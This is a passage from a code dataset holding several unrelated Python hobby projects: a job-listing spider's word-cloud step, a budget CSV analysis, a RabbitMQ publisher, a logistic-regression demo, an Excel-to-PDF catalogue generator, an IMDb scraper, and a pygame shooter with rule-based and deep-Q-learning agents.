was lost in extraction\n                            f.write(theStr)\n                            print(theStr)\n                    time.sleep(0.1)\n\n                    time.sleep(random.randint(1, 5)*0.1)\n                    f.close()\n                except IOError:\n                    print('Job csv file not found, please run the run() method first')\n                except Exception as e:\n                    print(e.args)\n                finally:\n                    print('Get detail finish!')\n\n        print('run_getDetail end')\n\n    def processData(self):\n        # Clean the crawled job detail data\n\n        # word cloud keyword extraction limit; the smaller, the fewer keywords\n        MyTopK = 200\n\n        # only include words with the specified parts of speech\n        MyAllowPOS = ('n','nr','ns','nt','nw','nz','s','f','t','t','an')\n\n        try:\n            for job in self.jobs:\n\n                print('Current job:', job)\n\n                for city in self.citys:\n\n                    f = open(os.getcwd()+'/spider/data/' +\n                             self.targetName+'_keyword-'+job+'_city-'+city+'.txt', 'w')\n\n                    str_jobRequire = str()\n\n                    with open(os.getcwd()+'/spider/data/' +\n                              self.targetName+'_require-'+job+'_city-'+city+'.txt') as txtFile:\n                        while(True):\n                            str_line = txtFile.readline()\n\n                            if not str_line:\n                                break\n\n                            str_jobRequire = str_jobRequire+str_line\n\n                    str_jobRequire = str_jobRequire.replace('\\n\\n', '\\n')\n                    str_jobRequire = str_jobRequire.replace(' ', '')\n\n                    # remove list numbering and trailing markers\n                    str_jobRequire = re.sub(\n                        r'([0-9 a-z]+[\\.\\、,,))])|( [0-9]+ )|[;;]', '', str_jobRequire)\n\n                    # remove unimportant punctuation\n                    str_jobRequire = re.sub(r'[,、。【】()/]', ' ', str_jobRequire)\n\n                    # jieba word segmentation\n                    # keywords = jieba.cut(str_jobRequire,cut_all=False)\n\n                    # TF-IDF\n                    TF_IDF = analyse.extract_tags\n                    keywords = TF_IDF(str_jobRequire, topK=MyTopK,allowPOS=MyAllowPOS)\n\n                    num_word = 0\n\n                    for key in keywords:\n                        print(key, end=' ')\n                        num_word = num_word+1\n                        f.write(key+' ')\n                        if num_word % 10 == 0:\n                            f.write('\\n')\n\n                    f.write('\\n')\n\n                    print('\\n\\n')\n\n                    f.close()\n\n                    time.sleep(0.1)\n        except IOError as e:\n            print('Unable to open the job detail file, please run run_getDetail() first')\n        except Exception as e:\n            print(e.args)\n        finally:\n            print('processData finish!')\n\n        print('processData end')\n\n    def createWordCloud(self):\n        try:\n            for job in self.jobs:\n                for city in self.citys:\n\n                    with open(os.getcwd()+'/spider/data/' +\n                              self.targetName+'_keyword-'+job+'_city-'+city+'.txt', 'r') as txtFile:\n                        str_keyword = str()\n\n                        while(True):\n                            str_line = txtFile.readline()\n                            if not str_line:\n                                break\n                            if str_line == '':\n                                continue\n                            str_keyword = str_keyword + str_line\n\n                    print(str_keyword)\n\n                    wordcloud = WordCloud(font_path='./font/PingFang.ttc',\n                                          background_color=\"white\").generate(str_keyword)\n\n                    plt.imshow(wordcloud, interpolation='bilinear')\n                    plt.axis(\"off\")\n                    # plt.show()\n\n                    plt.savefig(os.getcwd() + self.targetDir +\n                                self.targetName+'_wordCloud-'+job+'_city-'+city+'.png')\n\n        except IOError:\n            print('Open File Error')\n\n        except Exception as e:\n            print(e.args)\n        finally:\n            print('createWordCloud Finish!')\n\n        print('createWordCloud end')\n\n    def setTime():\n        pass\n\n\nif __name__ == '__main__':\n    # create the spider object\n    spider = MySpider()\n\n    # crawl the job urls\n    # spider.run()\n\n    # crawl the job details; run MySpider's run() method before this step\n    # spider.run_getDetail()\n\n    # clean the job detail data\n    # spider.processData()\n\n    # generate word clouds from the job keywords\n    spider.createWordCloud()\n","repo_name":"Kingfish404/find-jobs-app","sub_path":"spider/Spider_liepin.py","file_name":"Spider_liepin.py","file_ext":"py","file_size_in_byte":10737,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"36"}
+{"seq_id":"28654168798","text":"## PyBank\n\n# Create a Python script that analyzes the records to calculate each of the following:\n\n# Imports the dependencies to: create file paths across operating systems (os) and read from csv files (csv)\nimport os \nimport csv \n\n# Set the csv (read from) and text (write to) file paths using the os module (imported 
above)\ncsv_path = os.path.join('Resources/', 'budget_data.csv') \ntext_path = os.path.join('Analysis/', 'budget_analysis.txt') \n\nfile_name = 'budget_data.csv'\n\n# Creates variables and sets initial values to zero (as integers); important to set variables before open/read or open/write\nnum_months = 0 \n# The total number of months included in the dataset\nnet_profit_loss = 0 \n# The net total amount of \"Profit/Losses\" over the entire period\navg_profit_loss = 0 \n# The average of the changes in \"Profit/Losses\" over the entire period\nmax_profit = 0 \n# The greatest increase in profits (date and amount) over the entire period\nmax_loss = 0 \n# The greatest decrease in losses (date and amount) over the entire period\n\nwith open(csv_path, 'r') as csvfile: # Opens and reads the file using the csv module\n    # Initiates DictReader from csv module, and the ability to reference dictionary keys (i.e. \"Profit/Losses\")\n    csv_reader = csv.DictReader(csvfile)\n    # Reads each row of the dictionary\n    for row in csv_reader: \n        budget_row = int(row[\"Profit/Losses\"]) # Converts content of column to integer, example here: https://courses.cs.washington.edu/courses/cse140/13wi/csv-parsing.html\n        net_profit_loss += int(row[\"Profit/Losses\"]) # Accumulates the running net total of \"Profit/Losses\"\n        if max_profit == 0 or max_profit < budget_row: # If statement to compare each row until the largest numeric value is found, example here: https://courses.cs.washington.edu/courses/cse140/13wi/csv-parsing.html\n            max_profit = int(budget_row)\n        if max_loss == 0 or max_loss > budget_row: # If statement to compare each row until the smallest numeric value is found, example (above) reversed for smallest value\n            max_loss = int(budget_row) \n    \n    # Creates variable for counting the number of lines, minus the header row \n    num_months = csv_reader.line_num - 1\n    \n    # Format the calculated values after loop, but before print\n    avg_profit_loss = \"${:,.2f}\".format(net_profit_loss/num_months)\n    net_profit_loss = \"${:,.2f}\".format(net_profit_loss)\n    max_profit = \"${:,.2f}\".format(max_profit)\n    max_loss = \"${:,.2f}\".format(max_loss)\n    # Formatting with comma separators: https://www.kite.com/python/answers/how-to-add-commas-to-a-number-in-python\n    # Formatting with two decimal points: https://www.kite.com/python/answers/how-to-print-a-float-with-two-decimal-places-in-python#:~:text=Use%20str.,float%20with%20two%20decimal%20places&text=format(number)%20with%20%22%7B,string%20to%20print%20the%20float.\n    # Formatting with leading dollar sign: https://www.daniweb.com/programming/software-development/threads/463071/percentages-and-dollar-signs-in-output \n    \n    # Prints to terminal\n    print(f\"CSV Path: {csv_path}\") \n    print(f\"Analysis Path: {text_path}\")\n    print(f\" \")\n    print(f\"Budget Analysis of {file_name}\")\n    print(f\"Number of Months: {num_months}\")\n    print(f\"Net Profit/Loss: {net_profit_loss}\")\n    print(f\"Average Profit/Loss: {avg_profit_loss}\")\n    print(f\"Greatest Increase Profit/Loss: {max_profit}\")\n    print(f\"Greatest Decrease Profit/Loss: {max_loss}\")\n\n# Opens output file, and writes to it (ref: Python Documentation here https://docs.python.org/3/library/csv.html#writer-objects\nwith open(text_path, \"w\", newline='') as csvfile: # Eliminate blank lines in output: https://stackoverflow.com/questions/3348460/csv-file-written-with-python-has-blank-lines-between-each-row\n    # Used example included in csv.writer (i.e. 
spamwriter): https://docs.python.org/3/library/csv.html\n text_writer = csv.writer(csvfile, delimiter=' ', quotechar=' ', quoting=csv.QUOTE_MINIMAL)\n \n # Prints to the output.txt file\n text_writer.writerow(['Budget Analysis of',file_name]) \n text_writer.writerow(['Number of Months:',num_months])\n text_writer.writerow(['Net Profit/Loss:',net_profit_loss])\n text_writer.writerow(['Average Profit/Losses:',avg_profit_loss])\n text_writer.writerow(['Greatest Increase Profit/Loss:',max_profit])\n text_writer.writerow(['Greatest Decrease Profit/Loss:',max_loss])","repo_name":"dianewitt/03-python","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"1220696073","text":"#!/usr/bin/python \r\n# -*- coding: UTF-8 -*-\r\nimport pika \r\n\r\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\r\n host='localhost'))\r\nchannel = connection.channel()\r\n\r\nchannel.queue_declare(queue='hello-queue', \r\n\t\t\t\t\t\t\t\t\t\t\tauto_delete=True)\r\n\r\nchannel.basic_publish(exchange='hello-exchange',\r\n routing_key='hola',\r\n body='Hello World!')\r\nprint(\" [x] Sent 'Hello World!'\")\r\nconnection.close()","repo_name":"notepi/laboratory","sub_path":"rabbitmq/python/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"43016291219","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.metrics import classification_report\nfrom sklearn import preprocessing\n# 数据是否需要标准化\nscale = False\n\n# 画图正常显示中文\nplt.rcParams['font.sans-serif'] = ['SimHei'] # 用来正常显示中文标签\nplt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号\n\ndef sigmoid(x):\n return 1.0 / (1 + np.exp(-x))\n\ndef cost(xMat, yMat, ws):\n left = np.multiply(yMat, np.log(sigmoid(xMat * ws)))\n right = np.multiply(1 - yMat, np.log(1 - sigmoid(xMat * ws)))\n return np.sum(left + right) / -(len(xMat))\n\ndef gradAscent(xArr, yArr):\n if scale == True:\n xArr = preprocessing.scale(xArr)\n xMat = np.mat(xArr)\n yMat = np.mat(yArr)\n # 学习率\n lr = 0.001\n # 迭代次数\n epochs = 10000\n # 申明一个列表用来存储loss\n costList = []\n # 计算数据行列数\n # 行代表数据个数,列代表权值个数\n m, n = np.shape(xMat)\n # 初始化权值\n ws = np.mat(np.ones((n, 1)))\n\n for i in range(epochs + 1):\n # xMat和weights矩阵相乘\n h = sigmoid(xMat * ws)\n # 计算误差\n ws_grad = xMat.T * (h - yMat) / m\n ws = ws - lr * ws_grad\n\n if i % 50 == 0:\n costList.append(cost(xMat, yMat, ws))\n return ws, costList\n\ndef plot(x_data, y_data):\n x0 = []\n x1 = []\n y0 = []\n y1 = []\n # 切分不同类别的数据\n for i in range(len(x_data)):\n if y_data[i] == 0:\n x0.append(x_data[i, 0])\n y0.append(x_data[i, 1])\n else:\n x1.append(x_data[i, 0])\n y1.append(x_data[i, 1])\n\n # 画图\n scatter0 = plt.scatter(x0, y0, c='b', marker='o')\n scatter1 = plt.scatter(x1, y1, c='r', marker='x')\n # 画图例\n plt.title(\"训练数据集散点分布\")\n plt.xlabel(\"自变量:x0\")\n plt.ylabel(\"自变量:x1\")\n plt.legend(handles=[scatter0, scatter1], labels=['label0', 'label1'], loc='best')\n plt.savefig(\"LR_scatter.png\")\n # plt.show()\n\ndef plot_result(ws,x_data,y_data):\n # 画图决策边界\n plot(x_data,y_data)\n x_test = [[-4],[3]]\n y_test = (-ws[0] - x_test*ws[1])/ws[2]\n plt.plot(x_test, y_test, 'k')\n plt.savefig(\"LR_result.png\")\n plt.show()\n\ndef plot_loss(costList):\n # 画图 loss值的变化\n x = np.linspace(0, 10000, 201)\n plt.plot(x, costList, c='r')\n plt.title('Train')\n 
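
The send.py script above publishes to `hello-exchange` with routing key `hola` while only declaring `hello-queue`, and never binds the two. A hedged sketch of the consumer side that would actually receive the message (pika 1.x API; the `direct` exchange type is an assumption):

```python
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import pika

connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = connection.channel()

# Declare both ends and the binding the producer omits.
channel.exchange_declare(exchange='hello-exchange', exchange_type='direct')
channel.queue_declare(queue='hello-queue', auto_delete=True)
channel.queue_bind(queue='hello-queue', exchange='hello-exchange',
                   routing_key='hola')

def callback(ch, method, properties, body):
    print(" [x] Received %r" % body)

channel.basic_consume(queue='hello-queue', on_message_callback=callback,
                      auto_ack=True)
channel.start_consuming()
```
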
plt.xlabel('Epochs')\n    plt.ylabel('Cost')\n    plt.savefig(\"LR_Loss.png\")\n    plt.show()\n\n# 预测\ndef predict(x_data, ws):\n    if scale == True:\n        x_data = preprocessing.scale(x_data)\n    xMat = np.mat(x_data)\n    ws = np.mat(ws)\n    return [1 if x >= 0.5 else 0 for x in sigmoid(xMat*ws)]\n\ndef train():\n    # 载入数据\n    data = np.genfromtxt(\"LR-testSet.csv\", delimiter=\",\")\n    x_data = data[:, :-1]\n    y_data = data[:, -1]\n    # 绘制散点图\n    plot(x_data, y_data)\n    # 数据处理,添加偏置项\n    x_data = data[:, :-1]\n    y_data = data[:, -1, np.newaxis]\n    print(\"x_data的数据形状为:\", np.mat(x_data).shape)\n    print(\"y_data的数据形状为:\", np.mat(y_data).shape)\n    # 给样本添加偏置项\n    X_data = np.concatenate((np.ones((100, 1)), x_data), axis=1)\n    print(\"x_data添加偏置后X_data的数据形状为:\", X_data.shape)\n\n    # 训练模型,得到权值和cost值的变化\n    ws, costList = gradAscent(X_data, y_data)\n    print(\"训练后得到的权值列表为:\", ws)\n\n    print(\"保存决策边界结果图像\")\n    plot_result(ws, x_data, y_data)\n\n    predictions = predict(X_data, ws)\n    print(classification_report(y_data, predictions))\n    print(\"保存loss下降结果……\")\n    plot_loss(costList)\n\nif __name__ == '__main__':\n    train()\n\n\n","repo_name":"asong1997/TensorFlow_Learning","sub_path":"samples_nn/logistic_regression(2).py","file_name":"logistic_regression(2).py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"1524157561","text":"# Import Dependencies\nimport pandas as pd\nimport numpy as np\nfrom fpdf import FPDF\nimport unicodedata\n\n# Reading input files\n# Input_path = \"CatalogoNAC_02.xlsx\"\n# df = pd.read_excel(Input_path, sheet_name='Inventario')\n#print(df)\n\ntitle = 'Nacimientos'\n\nclass PDF(FPDF):\n    def header(self):\n        # Arial bold 15\n        self.set_font('Arial','B',15)\n        # Calculate width of title and position\n        w = self.get_string_width(title) + 6\n        self.set_x((210 - w) / 2)\n        # Colors of frame, background and text\n        self.set_draw_color(0, 80, 180) # Blue\n        self.set_fill_color(255, 255, 255) # Yellow\n        self.set_text_color(0, 0, 0) # Black\n        # Thickness of frame (1 mm)\n        self.set_line_width(1)\n        # Title\n        self.cell(w=w, h=9, txt=title, border=1, ln=1, align='C', fill=1)\n        # Line break\n        self.ln(10)\n\n    def footer(self):\n        # Position at 1.5 cm from bottom\n        self.set_y(-15)\n        # Arial italic 8\n        self.set_font('Arial', 'I', 8)\n        # Text color in gray\n        self.set_text_color(128)\n        # Page number\n        self.cell(0, 10, 'Page ' + str(self.page_no()), 0, 0, 'C')\n\n    def nacimiento_num(self, num):\n        # Arial 12\n        self.set_font('Arial', '', 12)\n        # Background color\n        self.set_fill_color(200, 220, 255)\n        # Title\n        self.cell(0, 6, 'Número: %d' % (num), 0, 1, 'L', 1)\n        # Line break\n        self.ln(0)\n    \n    def nacimiento_pais(self, pais):\n        # Arial 12\n        self.set_font('Arial', '', 12)\n        # Background color\n        self.set_fill_color(200, 220, 255)\n        # Title\n        self.cell(0, 6, 'País: %s' % (pais), 0, 1, 'L', 1)\n        # Line break\n        self.ln(0)\n\n    def nacimiento_ciudad(self, ciudad):\n        # Arial 12\n        self.set_font('Arial', '', 12)\n        # Background color\n        self.set_fill_color(200, 220, 255)\n        # Title\n        self.cell(0, 6, 'Ciudad: %s' % (ciudad), 0, 1, 'L', 1)\n        # Line break\n        self.ln(0)\n\n    def nacimiento_descripcion(self, descripcion):\n        # Arial 12\n        self.set_font('Arial', '', 12)\n        # Background color\n        self.set_fill_color(200, 220, 255)\n        # Title\n        self.cell(0, 6, 'Descripción: %s' % (descripcion), 0, 1, 'L', 1)\n        # Line break\n        self.ln(0)\n\n    def nacimiento_material(self, material):\n        # Arial 12\n        self.set_font('Arial', '', 12)\n        # Background color\n        self.set_fill_color(200, 220, 
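
A quick cross-check for the hand-rolled gradient ascent above: fit scikit-learn's `LogisticRegression` on the same file and compare the weights and classification report. The sketch assumes the same two-feature, 0/1-label layout of `LR-testSet.csv`:

```python
# Reference fit to compare against ws from gradAscent().
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import classification_report

data = np.genfromtxt("LR-testSet.csv", delimiter=",")
x, y = data[:, :-1], data[:, -1]

clf = LogisticRegression().fit(x, y)
print(clf.intercept_, clf.coef_)              # bias and weights
print(classification_report(y, clf.predict(x)))
```
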
255)\n # Title\n self.cell(0, 6, 'Material: %s' % (material), 0, 1, 'L', 1)\n # Line break\n self.ln(0)\n \n def nacimiento_regalo(self, regalo):\n # Arial 12\n self.set_font('Arial', '', 12)\n # Background color\n self.set_fill_color(200, 220, 255)\n # Title\n self.cell(0, 6, 'Regalo de: %s' % (regalo), 0, 1, 'L', 1)\n # Line break\n self.ln(0)\n \n def nacimiento_piezas(self, piezas):\n # Arial 12\n self.set_font('Arial', '', 12)\n # Background color\n self.set_fill_color(200, 220, 255)\n # Title\n self.cell(0, 6, 'Piezas: %s' % (piezas), 0, 1, 'L', 1)\n # Line break\n self.ln(0)\n\n def nacimiento_year(self, year):\n # Arial 12\n self.set_font('Arial', '', 12)\n # Background color\n self.set_fill_color(200, 220, 255)\n # Title\n self.cell(0, 6, 'Año: %.0f' % (year), 0, 1, 'L', 1)\n # Line break\n self.ln(0)\n\n def nacimiento_image(self):\n self.ln(6)\n self.cell(0, 190,'', 1,1)\n self.ln(0) \n\n def print_nacimiento(self, num, pais, ciudad, descripcion, material, regalo, piezas, year):\n self.add_page()\n self.nacimiento_num(num)\n self.nacimiento_pais(pais)\n self.nacimiento_ciudad(ciudad)\n self.nacimiento_descripcion(descripcion)\n self.nacimiento_material(material)\n self.nacimiento_regalo(regalo)\n self.nacimiento_piezas(piezas)\n self.nacimiento_year(year)\n self.nacimiento_image()\n\n# Reading input files\nInput_path = \"CatalogoNAC.xlsx\"\ndf = pd.read_excel(Input_path, sheet_name='Inventario')\n\n# Creating variables\nnumber_s = pd.Series(df[\"Núm.\"])\ncountry_s = pd.Series(df[\"Pais\"])\ncity_s = pd.Series(df[\"Ciudad\"])\ndescription_s = pd.Series(df[\"Descripción\"])\nmaterial_s = pd.Series(df[\"Material\"])\ngift_s = pd.Series(df[\"Regalo de:\"])\npieces_s = pd.Series(df[\"Piezas\"])\nyear_s = pd.Series(df[\"Año\"])\n\n# PDF creation\npdf = PDF()\npdf.set_title(title)\n\n# Obtaining data\nfor n in range(number_s.size):\n #print(number_s.iloc[n])\n pdf.print_nacimiento(number_s.iloc[n], country_s.iloc[n], city_s.iloc[n], description_s.iloc[n], material_s.iloc[n], gift_s.iloc[n], pieces_s.iloc[n], year_s.iloc[n])\n\n# Exporting PDF\npdf.output('tuto3.pdf', 'F')\n\n","repo_name":"Rodoba96/excel2pdf","sub_path":"Test/NacimientoPDF.py","file_name":"NacimientoPDF.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"19771024675","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef main():\r\n request_func()\r\n \r\n\r\ndef request_func():\r\n html = \"https://www.imdb.com/chart/moviemeter/?ref_=nv_mv_mpm\"\r\n request = requests.get(html)\r\n status = request.status_code\r\n print(\"Status: \",status)\r\n if status == 200:\r\n print(\"We've been contacted. 
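
The driver at the bottom of NacimientoPDF.py above keeps eight parallel `pd.Series` and indexes each with `.iloc[n]`; a single pass with `iterrows` does the same job. A sketch assuming the same sheet and column names:

```python
# One-pass alternative to the eight parallel Series in the driver above.
# Assumes `PDF` and `title` are defined as in the script.
import pandas as pd

pdf = PDF()
pdf.set_title(title)
df = pd.read_excel("CatalogoNAC.xlsx", sheet_name="Inventario")
for _, row in df.iterrows():
    pdf.print_nacimiento(row["Núm."], row["Pais"], row["Ciudad"],
                         row["Descripción"], row["Material"],
                         row["Regalo de:"], row["Piezas"], row["Año"])
pdf.output('tuto3.pdf', 'F')
```
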
The shredding process begins...\")\r\n parse_html(request)\r\n else:\r\n print(\"Connection failed.\")\r\n\r\ndef parse_html(url):\r\n header=[]\r\n imdb_rating= []\r\n years = []\r\n soup = BeautifulSoup(url.text,\"html.parser\")\r\n movies = soup.find('tbody', class_=\"lister-list\").find_all('tr')\r\n \r\n \r\n for movie in movies:\r\n title = movie.find('td' , class_=\"titleColumn\").a.text\r\n year = movie.find('td', class_=\"titleColumn\").span.text.strip('()')\r\n header.append(title)\r\n years.append(year)\r\n\r\n for i in range(0, len(header)):\r\n print(\"Name of the Movie: {} Year: {}\".format(header[i],years[i]))\r\n\r\n\r\nmain()","repo_name":"oykuss/programming-python","sub_path":"webScraping.py","file_name":"webScraping.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"30600951232","text":"# -*- coding:utf-8 -*-\n# __author__ = 'wsm'\nfrom pygame.locals import *\nfrom plane_sprite import *\nfrom collections import deque\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom keras import backend as K\nimport pygame\nimport numpy as np\n\nFRAME_PER_ACTION = 1\n\n\nclass PlaneGame(object):\n \"\"\"\n Game main class\n \"\"\"\n def __init__(self):\n # 创建游戏窗口\n # Create game windows\n self.screen = pygame.display.set_mode(SCREEN_RECT.size, HWSURFACE | DOUBLEBUF)\n pygame.display.set_caption(\"Air Fight with two types of AI\")\n\n # 设置时钟及其刷新频率\n # Set clock and its refresh frequency\n self.clock = pygame.time.Clock()\n self.clock.tick(FRAME_PRE_SEC)\n\n # 实时显示得分\n # Show the score instantly\n pygame.font.init()\n self.score = 0\n self.score_font = pygame.font.SysFont('arial', 16)\n\n # 调用私有方法,创建精灵和精灵组\n # Create sprites and sprite groups by private method\n self._create_sprites()\n\n # 设置定时器事件 - 创建敌机 2s,英雄发射子弹1.5ms, 敌机发射子弹3s\n # Set three events to appear on the event queue:\n # 1. create one enemy per 2s\n # 2. hero fires per 1.5s\n # 3. 
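
`parse_html` above collects titles and years into parallel lists and re-indexes them; `zip`-free direct printing reads more simply. The sketch also adds `raise_for_status()` and a User-Agent header, since IMDb often rejects bare requests; the selectors assume the same page layout the scraper targets:

```python
import requests
from bs4 import BeautifulSoup

resp = requests.get("https://www.imdb.com/chart/moviemeter/",
                    headers={"User-Agent": "Mozilla/5.0"})
resp.raise_for_status()                      # fail loudly instead of checking == 200

soup = BeautifulSoup(resp.text, "html.parser")
for movie in soup.find('tbody', class_="lister-list").find_all('tr'):
    title = movie.find('td', class_="titleColumn").a.text
    year = movie.find('td', class_="titleColumn").span.text.strip('()')
    print("Name of the Movie: {} Year: {}".format(title, year))
```
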
enemy fires per 3s\n pygame.time.set_timer(CREATE_ENEMY_EVENT, 2000)\n pygame.time.set_timer(HERO_FIRE_EVENT, 1500)\n pygame.time.set_timer(ENEMY_FIRE_EVENT, 3000)\n\n def _start_game(self):\n # 为了让窗口长时间显示,需要放到循环里\n # To display the windows constantly, we need to update the windows in a loop\n while True:\n \n self._event_handler()\n\n self._control()\n\n # 碰撞检测\n # Detect collision\n self._check_collide()\n\n # 更新/绘制精灵组\n # Update sprites on the display\n self._update_sprite()\n\n # 实时显示得分\n # Show the score instantly\n self.score_surface = self.score_font.render(u'score = %d' % self.score, True, (0, 0, 0))\n self.screen.blit(self.score_surface, (5, 5))\n\n # 更新显示\n pygame.display.update()\n\n def _create_sprites(self):\n\n # 创建游戏背景\n # Create background sprite\n bg1 = BackGround()\n bg2 = BackGround(True)\n self.back_group = pygame.sprite.Group(bg1, bg2)\n\n # 创建敌机精灵组\n # Create enemy sprite group\n self.enemy_group = pygame.sprite.Group()\n\n def _event_handler(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self._game_over(self)\n\n elif event.type == CREATE_ENEMY_EVENT:\n # 敌机出场\n # Create one enemy\n enemy = Enemy()\n # This enemy fires\n enemy.fire()\n # Add this enemy to the enemy sprite group\n self.enemy_group.add(enemy)\n\n elif event.type == HERO_FIRE_EVENT:\n self.hero.fire()\n\n elif event.type == ENEMY_FIRE_EVENT:\n for one_enemy in self.enemy_group:\n one_enemy.fire()\n\n def _control(self):\n pass\n\n\n def _check_collide(self):\n # 1.英雄子弹摧毁敌机\n # 1. Hero's bullets destroy enemies\n enemies = pygame.sprite.groupcollide(self.hero.bullet_group, self.enemy_group, True, True)\n for enemy in enemies:\n self.score += 1\n\n # 2.敌机或者子弹撞毁英雄\n # 2. Hero is killed by enemies or enemies'bullets\n enemies_killers = pygame.sprite.spritecollide(self.hero, self.enemy_group, True)\n bullets = 0\n for one_enemy in self.enemy_group:\n bullets += len(pygame.sprite.spritecollide(self.hero, one_enemy.enemy_bullet_group, False))\n\n # 判断列表有无内容\n # If there exist enemy or bullet which collide with Hero, the game is over\n if len(enemies_killers) > 0 or bullets > 0:\n # Destroy hero\n self.hero.kill()\n # Game over\n PlaneGame._game_over(self)\n\n def _update_sprite(self):\n self.back_group.update()\n self.back_group.draw(self.screen)\n\n self.enemy_group.update()\n self.enemy_group.draw(self.screen)\n\n # 所有敌机的子弹都要更新\n # All of bullets of each enemy need to be updated their location\n for one_enemy in self.enemy_group:\n one_enemy.enemy_bullet_group.update()\n one_enemy.enemy_bullet_group.draw(self.screen)\n\n self.hero_group.update()\n self.hero_group.draw(self.screen)\n\n self.hero.bullet_group.update()\n self.hero.bullet_group.draw(self.screen)\n\n @staticmethod\n def _game_over(self):\n pygame.quit()\n exit()\n\n\n# Real player class\nclass PlayerGame(PlaneGame):\n\n def __init__(self):\n super().__init__()\n self.hero = PlayerHero()\n self.hero_group = pygame.sprite.Group(self.hero)\n\n def start_game(self):\n super()._start_game()\n \n def _control(self):\n # 使用键盘提供的方法获取键盘按键 - 按键元组\n # Get the press tuple from the keyboard\n pressed_key = pygame.key.get_pressed()\n\n # 判断元组对应的按键索引值 按下为1,否则为0\n # If the key is pressed, corresponding value in the press tuple is 1, otherwise is 0;\n # 速度=4个像素/每次刷新\n # speed = 4 px/update\n if pressed_key[pygame.K_RIGHT]:\n self.hero.xspeed = 4\n elif pressed_key[pygame.K_LEFT]:\n self.hero.xspeed = -4\n elif pressed_key[pygame.K_UP]:\n self.hero.yspeed = -4\n elif pressed_key[pygame.K_DOWN]:\n self.hero.yspeed = 4\n else:\n 
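
PlaneGame schedules enemy spawning and fire entirely through `pygame.time.set_timer` custom events dispatched in `_event_handler`. The pattern in isolation (event id and interval are illustrative):

```python
# set_timer() posts a user event every N ms; the main loop switches on it.
import pygame

pygame.init()
screen = pygame.display.set_mode((320, 240))
SPAWN_EVENT = pygame.USEREVENT + 1
pygame.time.set_timer(SPAWN_EVENT, 2000)     # fire every 2 s

running = True
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
        elif event.type == SPAWN_EVENT:
            print("spawn an enemy here")
    pygame.display.update()
pygame.quit()
```
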
self.hero.xspeed = 0\n self.hero.yspeed = 0\n\n\n# Rule-based AI\n# Adapted from flock algorithm\nclass FlockGame(PlaneGame):\n\n def __init__(self):\n super().__init__()\n\n # Create Rule-based AI Hero\n self.hero = FlockHero()\n self.hero_group = pygame.sprite.Group(self.hero)\n\n def start_game(self):\n super()._start_game()\n\n def _control(self):\n # 获得所有敌机产生的所有子弹\n # Get all the bullets produced by all the enemies\n all_bullets = pygame.sprite.Group()\n for enemy in self.enemy_group:\n all_bullets.add(enemy.enemy_bullet_group)\n\n # 英雄根据当前环境做出反应\n self.hero.my_update(self.enemy_group, all_bullets)\n\n\nclass DRLGame(PlaneGame):\n\n def __init__(self):\n super().__init__()\n # 计算量太大,将事件频率降低,画面会好一点\n # As model-training is time-consuming, it would better to decrease the event frequency\n pygame.time.set_timer(CREATE_ENEMY_EVENT, 2000)\n pygame.time.set_timer(HERO_FIRE_EVENT, 1000)\n pygame.time.set_timer(ENEMY_FIRE_EVENT, 3000)\n\n # AI agent has 4 states and 5 corresponding actions\n self.state_size = 4\n self.action_size = 5\n\n self.hero = DRLHero()\n self.hero_group = pygame.sprite.Group(self.hero)\n\n self.STATE_1 = numpy.array([1, 0, 0, 0]) # 上方有敌机 没有在危险区内的子弹 There exist enemies above Hero, but no dangerous bullets\n self.STATE_2 = numpy.array([0, 1, 0, 0]) # 上方有敌机,有在危险区内的子弹 There exist enemies above Hero, also dangerous bullets\n self.STATE_3 = numpy.array([0, 0, 1, 0]) # 上方无敌机,没有子弹 There exist no enemies above Hero, as well as no bullets\n self.STATE_4 = numpy.array([0, 0, 0, 1]) # 上方无子弹,但是敌机会击中英雄 There exist enemies that can collide with Hero\n\n # Training parameters\n\n self.OBSERVE = 3200 # timesteps to observe before training\n self.EXPLORE = 300000 # frames over which to anneal epsilon\n self.FINAL_EPSILON = 0.0001 # final value of epsilon\n self.INITIAL_EPSILON = 0.1 # starting value of epsilon\n self.FRAME_PER_ACTION = 1\n self.REPLAY_MEMORY = 50000\n self.EPISODES = 500000\n self.batch_size = 32\n self.gamma = 0.99 # decay rate of past observations\n self.learning_rate = 0.001\n\n \n def start_game(self):\n\n\n # super()._event_handler()\n # self.model = self.build_model()\n # # 训练模型\n # # Training the model by Q learning\n # self.train_network()\n\n #-----------------------------------------------------------------------\n # 模型训练好,用下面的代码\n # After getting the trained parameters, remove the comments\n # 下载训练好的模型的参数\n # Load the trained parameters\n self.model = self.build_model()\n self.model.load_weights(\"model.h5\")\n super()._start_game()\n\n\n def _control(self):\n # get the first state\n s_t = numpy.array([0, 0, 1, 0])\n\n # In keras, need to reshape\n s_t = np.reshape(s_t, [1, self.state_size])\n a_t = np.zeros([self.action_size])\n\n q = self.model.predict(s_t)\n max_Q = np.argmax(q)\n a_t[max_Q] = 1\n self.hero.my_update(a_t)\n\n\n def build_model(self):\n # Neural Net for Deep-Q learning Model\n model = Sequential()\n model.add(Dense(24, input_dim=self.state_size, activation='relu'))\n model.add(Dense(24, activation='relu'))\n model.add(Dense(self.action_size, activation='relu'))\n model.compile(loss='mse',\n 